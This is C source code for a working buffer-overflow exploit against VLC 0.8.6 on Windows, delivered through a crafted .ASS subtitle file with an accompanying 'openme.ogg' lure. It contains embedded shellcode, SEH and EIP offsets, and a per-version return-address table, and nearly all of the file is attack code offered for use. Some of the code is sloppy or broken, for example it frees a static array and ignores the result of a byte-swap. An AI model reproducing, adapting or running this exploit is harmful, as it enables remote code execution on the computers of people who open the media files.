299 lines
No EOL
8.7 KiB
C
299 lines
No EOL
8.7 KiB
C
/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
|
|
[%]Works every time,works on any win32 OS,tested on Windows xp sp2.
|
|
|
|
[%]My doctor said that I have seriuouse problems ,but I think he's full of it
|
|
because the voices tell me I'm ok!*/
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
#include<stdint.h>
|
|
|
|
#define File "subtitle666.ass"
|
|
#define OGGfile "openme.ogg"
|
|
#define IF(x,NULL) if(x==NULL)
|
|
#define FOR(i,a,b) for(i=a;i<b;++i)
|
|
#define WHILE(z) while(z>0)
|
|
#define is_bigendian() ((*(char*)&i)==0)
|
|
#define EIP_OFFSET 163852
|
|
#define SEH_OFFSET 165248
|
|
#define NEXTSEH_OFFSET 165244
|
|
/*-------------prototypes---------*/
|
|
//100% working shellcode
|
|
char vlcshellcode[]=
|
|
{
|
|
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
|
|
"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
|
|
"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
|
|
"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
|
|
"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
|
|
"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
|
|
"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
|
|
"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
|
|
"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
|
|
"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9"
|
|
};
|
|
char data[]=
|
|
{
|
|
"[Script Info]\n"
|
|
"; Script generated by Aegisub\n"
|
|
"; http://www.aegisub.net\n"
|
|
"Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)\n"
|
|
"Original Script: RoRo\n"
|
|
"Script Updated By: version 2.8.01\n"
|
|
"ScriptType: v4.00+\n"
|
|
"Collisions: Normal\n"
|
|
"PlayResY: 600\n"
|
|
"PlayDepth: 0\n"
|
|
"Timer: 100,0000\n"
|
|
"Video Aspect Ratio: 0\n"
|
|
"Video Zoom: 6\n"
|
|
"Video Position: 0\n"
|
|
"[V4+ Styles]\n"
|
|
"Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\n"
|
|
"Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0\n"
|
|
"[Events]\n"
|
|
"Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\n"
|
|
"Dialogue:"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" //165254 junk bytes to cause exception
|
|
};
|
|
char banner[]=
|
|
{
|
|
"******************************************************************\n"
|
|
" VLC 0.6.8x Buffer overflow exploit(win32 universal) *\n"
|
|
" *\n"
|
|
" by fl0 fl0w *\n"
|
|
"******************************************************************\n"
|
|
};
|
|
char arguments[]=
|
|
{
|
|
"---------------------------\n"
|
|
"Too few args! \n"
|
|
"sploit.exe [target 1/2/3/4]\n"
|
|
"---------------------------\n"
|
|
};
|
|
|
|
// data + 165254 nop + shellcode + szJMP(strcat)
|
|
/*--------extern variables----------*/
|
|
char b[1000000];
|
|
char c[1000000];
|
|
char d[1000000];
|
|
char f[1000000]; //1402 bytes nop
|
|
char seh[]="\x87\x75\x40\x4B";
|
|
char nseh[]="\x38\xFA\x74\x02";
|
|
int i;
|
|
int input;
|
|
char bf[4];
|
|
int t;
|
|
|
|
/*-------prototypes----------*/
|
|
int buildF();
|
|
int cpy(unsigned int,char*);
|
|
void print(char*);
|
|
void gen_random(char*, const int);
|
|
unsigned int getFsize(FILE*,char*);
|
|
int cpystr(char* dest,int,int);
|
|
int oggf(char* fname);
|
|
int Targetprint();
|
|
|
|
/*--------ogg file format---------*/
|
|
typedef struct aa
|
|
{ //28 bytes or 224 bits
|
|
uint32_t Cp; // Capture pattern � 32 bits
|
|
uint8_t Ver; // Version � 8 bits
|
|
uint8_t H; // Header type � 8 bits
|
|
uint64_t Gp; // Granule position � 64 bits
|
|
uint32_t Bsn; // Bitstream serial number � 32 bits
|
|
uint32_t Psn; // Page sequence number � 32 bits
|
|
uint32_t C; // Checksum � 32 bits
|
|
uint8_t Ps; // Page segments � 8 bits
|
|
uint8_t St; // Segment table 8 bit
|
|
}ogg;
|
|
/*------targets------------*/
|
|
struct
|
|
{
|
|
unsigned int eip;
|
|
char* etype;
|
|
}RET[]=
|
|
{
|
|
{
|
|
0x026DFA38,
|
|
"VLC 0.8.6 c"
|
|
},
|
|
{
|
|
0x0263FA38,
|
|
"VLC 0.8.6 b,d"
|
|
},
|
|
{
|
|
0x0267FA38,
|
|
"VLC 0.8.6 a"
|
|
},
|
|
{
|
|
0x0267FA38,
|
|
"VLC 0.8.6 b test1"
|
|
},
|
|
{
|
|
0x02B6FA38,
|
|
"VLC 0.8.6 RC1"
|
|
},
|
|
{
|
|
NULL,NULL
|
|
}
|
|
};
|
|
/*------main--------*/
|
|
int main(int argc,char* argv[])
|
|
{
|
|
if(argc<2)
|
|
{
|
|
system("CLS");
|
|
|
|
printf("%s%s",banner,arguments);
|
|
|
|
Targetprint();exit(0);
|
|
}
|
|
|
|
input=atoi(argv[1]);
|
|
|
|
switch(input)
|
|
{
|
|
case 0:
|
|
reverseInt(RET[0].eip);
|
|
cpy(RET[0].eip,bf);
|
|
break;
|
|
|
|
case 1:
|
|
reverseInt(RET[1].eip);
|
|
cpy(RET[1].eip,bf);
|
|
break;
|
|
|
|
case 2:
|
|
reverseInt(RET[2].eip);
|
|
cpy(RET[2].eip,bf);
|
|
break;
|
|
|
|
case 3:
|
|
reverseInt(RET[3].eip);
|
|
cpy(RET[3].eip,bf);
|
|
break;
|
|
|
|
case 4:
|
|
reverseInt(RET[4].eip);
|
|
cpy(RET[4].eip,bf);
|
|
break;
|
|
}
|
|
printf("[!]Using : %s retaddress\n",RET[input].etype);
|
|
buildF(b); oggf(OGGfile); getchar();
|
|
|
|
return 0;
|
|
}
|
|
int buildF(unsigned int retn)
|
|
{
|
|
FILE *f=fopen(File,"wb");
|
|
|
|
IF(f,NULL)
|
|
{
|
|
print("File .ass error!"); exit(0);}
|
|
gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/
|
|
memcpy(b+EIP_OFFSET,bf,4);
|
|
memset(b+EIP_OFFSET+4,0x90,10);
|
|
memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode));
|
|
|
|
fprintf(f,"%s%s",data,b);
|
|
|
|
free(data); fclose(f);
|
|
|
|
printf("[#]ASS file DONE!\n",getFsize(f,File));
|
|
|
|
return 0;
|
|
}
|
|
int oggf(char* fname)
|
|
{
|
|
FILE* g=fopen(fname,"wb");
|
|
IF(g,NULL)
|
|
{
|
|
print("File ogg error");
|
|
exit(0);
|
|
}
|
|
ogg *W666;
|
|
W666=(ogg*)malloc(sizeof(ogg));
|
|
W666->Cp=0x5367674F;
|
|
W666->Ver=0x00;
|
|
W666->H=0x02;
|
|
W666->Gp=0x00000000;
|
|
W666->Bsn=0x000060B8;
|
|
W666->Psn=0x00000000;
|
|
W666->C=0xA403D2F8;
|
|
W666->Ps=0x01;
|
|
W666->St=0x1E;
|
|
|
|
fwrite(W666,sizeof(W666),9,g);
|
|
|
|
fclose(g);
|
|
|
|
printf("[#]OGG file DONE!\n",getFsize(g,OGGfile));
|
|
|
|
return 0;
|
|
}
|
|
int cpy(unsigned int source,char* dest)
|
|
{
|
|
int len;
|
|
len=4;
|
|
memcpy(dest,&source,len+1);
|
|
return len;
|
|
}
|
|
void print(char* msg)
|
|
{
|
|
printf("[*]%s\n",msg);
|
|
}
|
|
|
|
void gen_random(char *s, const int len)
|
|
{
|
|
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
|
|
|
|
FOR(i,0,len)
|
|
{
|
|
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
|
|
}
|
|
s[len]=0;
|
|
}
|
|
unsigned int getFsize(FILE* g,char* gname)
|
|
{
|
|
unsigned int s;
|
|
|
|
g=fopen(gname,"rb");
|
|
|
|
IF(g,NULL)
|
|
{
|
|
print("File error at reading");
|
|
exit(0);
|
|
}
|
|
fseek(g,0,SEEK_END);
|
|
s=ftell(g);
|
|
|
|
return s;
|
|
}
|
|
int reverseInt(unsigned int i)
|
|
{
|
|
unsigned char c1, c2, c3, c4;
|
|
|
|
if(is_bigendian())
|
|
{
|
|
return i;
|
|
}else
|
|
{
|
|
c1=i&255;
|
|
c2=(i>>8)&255;
|
|
c3=(i>>16)&255;
|
|
c4=(i>>24)&255;
|
|
return((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4;
|
|
}
|
|
}
|
|
int cpystr(char* dest,int str,int len)
|
|
{
|
|
memset(dest,str,len+1);
|
|
return len;
|
|
}
|
|
int Targetprint()
|
|
{
|
|
print("Targets are:");
|
|
for(t=0;t<5;t++)
|
|
printf("[!]%s - [0x%d] - %d\n",RET[t].etype,RET[t].eip,t);
|
|
} |